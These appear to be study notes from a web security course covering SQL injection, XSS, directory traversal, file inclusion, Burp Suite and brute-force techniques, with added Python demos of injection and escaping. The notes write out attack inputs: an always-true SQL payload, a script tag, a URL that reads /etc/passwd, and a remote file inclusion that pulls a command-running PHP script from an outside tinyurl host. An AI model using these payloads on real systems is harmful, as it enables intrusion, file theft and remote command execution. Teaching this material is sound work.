Injection Vulnerabilities
Injections
Injection attacks occur when an attacker supplies untrusted input to an application
The payload contains malicious data that is processed as part of a query or command, altering the way the program was intended to function
Injections commonly occur in fields and forms on web applications
Cross-Site Scripting: Submitted user input that runs malicious scripts against a website; it depends on the application inserting the user's input into the client-side code
SQL Injection: Submitted user input that can run SQL commands against a database
Unintended SQL Queries
Structure of a SQL Database and Query:
select userid, salary from salaries where userid = 'jsmith'
- select: Used to read or select data from a table
- userid, salary: Two fields requested to be displayed
- from salaries: Instructs the program to select the data from the salaries table
- where userid = 'jsmith': Instructs the program to only return records where the user id is "jsmith"
Example of modification of the intended query to create unintended results:
select userid, salary from salaries where userid = 'jsmith' OR '1' = '1'
- The OR '1' = '1' always evaluates to true, so the where clause matches every row and the entire table is displayed
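The query above, run both ways against a constructed in-memory copy of the salaries table (added example, not from the original notes; the table contents are sample data). The vulnerable lookup builds the SQL by string concatenation, so the quote in the input closes the literal and the rest is parsed as SQL; the parameterized lookup hands the value to the driver separately, so it is only ever compared as a string.

```python
import sqlite3

# Constructed sample data standing in for the notes' salaries table.
SAMPLE_ROWS = [("jsmith", 52000), ("akim", 61000), ("rlopez", 48000)]

# The notes' payload; the application supplies the surrounding quotes itself.
PAYLOAD = "jsmith' OR '1' = '1"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table salaries (userid text, salary integer)")
    conn.executemany("insert into salaries values (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, userid: str) -> list:
    # Concatenation: the input becomes part of the statement text, so a quote
    # in the input ends the literal and "OR '1' = '1'" is parsed as SQL.
    sql = f"select userid, salary from salaries where userid = '{userid}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, userid: str) -> list:
    # Placeholder: the statement is fixed and the value travels separately,
    # so the whole input is compared against the userid column as one string.
    sql = "select userid, salary from salaries where userid = ?"
    return conn.execute(sql, (userid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "jsmith"))        # one row, as intended
    print(lookup_vulnerable(db, PAYLOAD))         # every row comes back
    print(lookup_parameterized(db, PAYLOAD))      # no userid equals the payload string
```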
XSS
Cross-Site Scripting (XSS): Web application attack that injects malicious scripts into vulnerable web applications
Impacts include:
- Redirecting to a spoof page
- Stealing the user’s cookies
- Adding a keylogger onto the user’s machine
- Downloading malware to the user’s machine
Reflected (Non-Persistent) XSS: Depends on the user input immediately returned to the user and not stored on the server
Stored (Persistent) XSS: Depends on the user input being stored on the server
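The reflected and stored cases side by side, as an added example that is not part of the original notes: a search page echoes the query back immediately (reflected), and a comment list echoes input saved earlier to later visitors (stored). Both are rendered through the same output-encoding step, which is the mitigation; the comment text is constructed sample data and the script tag only calls alert.

```python
import html
from typing import List

# Constructed sample input: a harmless script tag standing in for a payload.
PAYLOAD = "<script>alert(1)</script>"

# Constructed stored comments, one of them carrying the tag above.
STORED_COMMENTS = ["Nice selection of boats!", PAYLOAD]


def render_search(query: str, escape: bool) -> str:
    # Reflected: the query parameter is written straight into this response.
    shown = html.escape(query) if escape else query
    return f"<p>Results for: {shown}</p>"


def render_comments(comments: List[str], escape: bool) -> str:
    # Stored: text saved by one user is written into every later visitor's page.
    items = [html.escape(c) if escape else c for c in comments]
    return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def has_live_script_tag(page: str) -> bool:
    # Rough check for the demo: an unescaped <script tag survived into the markup.
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_search(PAYLOAD, escape=False))          # tag is live in the page
    print(render_search(PAYLOAD, escape=True))           # rendered as &lt;script&gt;...
    print(render_comments(STORED_COMMENTS, escape=True))
```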
Back-End Component Vulnerabilities
Directory Traversal
Directory Traversal: An attacker accesses files and directories from a web application outside a user’s authorized permissions
Process includes identifying the syntax the website uses to pull files from the server:
http://192.168.13.35/directory_traversal_1.php?page=message.txt
- The site pulls files using the query ?page=message.txt
Changing the target file will potentially trigger the site to load the provided file:
http://192.168.13.35/directory_traversal_1.php?page=bugs_owasp_top10_2010.txt
- This will load the file bugs_owasp_top10_2010.txt
Files outside of the site directory can be accessed as well:
http://192.168.13.35/directory_traversal_1.php?page=/etc/passwd
Real-World Challenges and Mitigations
In a real-world engagement, security analysts would likely not have direct access to the server's filesystem
Mitigation methods include limiting user input when calling for files and using input validation to limit the user’s ability to modify the file being accessed
Web Application Back-End Code
Local File Inclusion: Web application vulnerability in which an attacker tricks the application to run unintended back-end code or scripts that are local to the application’s filesystem
PHP (Hypertext Preprocessor) is a server-side language used to develop web applications
PHP is often used to connect to back-end databases, such as MySQL, and to create and work with website cookies
PHP Process:
- User visits a website and selects a link directing them to a .php webpage
- An HTTP request is made to the server
- The web server pre-processes the PHP scripts, which query the database for the requested items
- The database returns the requested data, and the web server sends the processed HTML back to the user with an HTTP response
- The user's browser renders the HTML to display the list of boats back to the user
Remote File Inclusion
Remote File Inclusion: Using remote files or scripts to conduct an attack similar to Local File Inclusion
Process:
- Identify the syntax of the URL calling the PHP file:
http://192.168.13.27/index.php?page=arbitrary-file-inclusion.php
index.php is the file and ?page=arbitrary-file-inclusion.php is the parameter
- Replace the parameter with a new parameter:
http://192.168.13.27/mutillidae/index.php?page=http://google.com
- Change the parameter to use another PHP script that allows passing bash commands to the server:
http://192.168.13.27/mutillidae/index.php?page=https://tinyurl.com/y498epmz
- Pass a command using the syntax &cmd=[command]:
http://192.168.13.27/mutillidae/index.php?page=https://tinyurl.com/y498epmz&cmd=ls
Web Application Tools
Intro to Web Proxies and Burp Suite
Web Proxy: Intermediary between the client and the server
Organizations use proxies to monitor and block harmful web traffic; some web proxies block specific websites
Individuals use proxies to browse anonymously
Burp Suite is a web application security tool that lies between the browser and the target application
Session Management Vulnerabilities
Session Hijacking: A malicious user obtains another user's unique session cookie and hijacks the victim's private session
Conducting Brute Force Attacks with Burp Intruder
Credential Stuffing: Using lists of usernames obtained from breaches of other websites to conduct brute force attacks
Password Spraying: Using a single weak password against a large list of usernames